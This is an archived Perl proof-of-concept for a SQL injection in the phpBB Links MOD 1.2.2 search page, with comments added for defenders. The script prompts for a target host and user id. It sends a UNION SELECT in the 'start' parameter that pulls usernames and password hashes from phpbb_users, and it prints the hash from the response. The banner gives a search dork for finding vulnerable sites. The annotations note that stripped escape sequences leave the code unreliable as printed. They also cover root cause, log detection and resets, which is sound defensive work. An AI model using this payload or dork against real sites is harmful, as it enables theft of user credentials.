
# Title : phpBB Links MOD 1.2.2 Remote SQL Injection Exploit
# Published : 2007-08-31
# Author : Don


#!/usr/bin/perl
#
# Archived proof-of-concept for a SQL injection in the search page of the
# phpBB "Links MOD" (links.php?t=search), annotated for defenders.
# What the visible code does:
#   1. prints a banner and prompts on STDIN for a host, a forum directory
#      and a numeric user id;
#   2. builds a GET path whose `start` query parameter carries a
#      UNION SELECT against the phpbb_users table;
#   3. sends that request over a plain TCP socket to port 80;
#   4. scans the response for a token and prints it as an "MD5-Hash".
#
# NOTE(review): escape sequences look stripped by the page extraction
# (`rn`, `w{32}`, the unescaped `//` inside the s/// further down), so the
# listing does not run as printed. It is left byte-for-byte as archived.
#
# Defender notes:
#   - Root cause, inferred from the request shape only: `start` presumably
#     reaches the SQL statement without being cast to an integer -- confirm
#     against the MOD's links.php. Validating it as digits-only (or casting
#     to int) on the server side closes this class of bug.
#   - Detection: access-log entries for links.php in which `start` holds
#     anything other than digits (UNION, SELECT, phpbb_users, a trailing /*).
#   - Impact: the selected columns are username and user_password. If such a
#     request shows up in logs, treat the affected password hashes as
#     disclosed and force resets.
#   - Code quality: no `use strict` / `use warnings`; every variable below is
#     an undeclared package global.

# Banner: affected versions as claimed by the author, the page fingerprints
# the author searched for, and the raw request string.
print q{

phpBB <= 2.0.22 - Links MOD <= v1.2.2 Remote SQL Injection Exploit

Bug discovered by Don
Dork: allinurl:links.php?t=search
   or: "Links MOD v1.2.2 by phpBB2.de"
SQL INJECTION: Exploit: links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=2/*

};

use IO::Socket;

# Interactive input. `chop` removes the last character unconditionally
# (here the newline from STDIN); `chomp` is the usual, safer choice.
print q{
=> Insert URL
=> without ( http )
=> };
$server = <STDIN>;
chop ($server);
print q{
=> Insert directory
=> es: /forum/ - /phpBB2/
=> };
$dir = <STDIN>;
chop ($dir);
print q{
=> User ID
=> Number:
=> };
$user = <STDIN>;
chop ($user);
# Dead code: the branch is empty, and nothing in this listing reads
# $myuser, $mypass or $myid after they are assigned.
if (!$ARGV[2]) {
}
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
# Intended to strip a leading scheme from the host. NOTE(review): as printed
# the inner slashes are unescaped, so this statement does not parse.
$server =~ s/(http://)//eg;
$path = $dir;
# The request path. $dir and $user are concatenated as typed, with no
# validation. The value placed in `start` is "1,1 UNION SELECT ...", and the
# trailing /* opens an SQL comment. This is the string to look for in web
# server logs.
$path .= "links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=".$user."/*";
print "
Exploit in process...rn";
# Plain-text HTTP over a raw TCP socket, port fixed at 80; the script dies
# with a generic message if the connection cannot be opened.
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "Exploit failed";
print "Exploitrn";
print "in process...rn";
# Hand-written HTTP/1.1 request: request line, Host, Accept, Connection.
print $socket "GET $path HTTP/1.1rn";
print $socket "Host: $serverrn";
print $socket "Accept: */*rn";
print $socket "Connection: closernrn";
# Printed before any response has been read, so this message says nothing
# about whether the request succeeded.
print "Exploit finished!rnrn";
# Read the response line by line and stop at the first line that matches.
while ($answer = <$socket>)
{
# NOTE(review): as printed this matches 32 literal "w" characters; the
# "MD5-Hash" label below suggests a 32-character hash was the intended
# target -- the pattern looks damaged by extraction.
if ($answer =~/(w{32})/)
{
# String comparison of the capture against 0.
if ($1 ne 0) {
print "MD5-Hash is: ".$1."rn";
}
# Exits on the first matching line whether or not anything was printed.
exit();
}
}
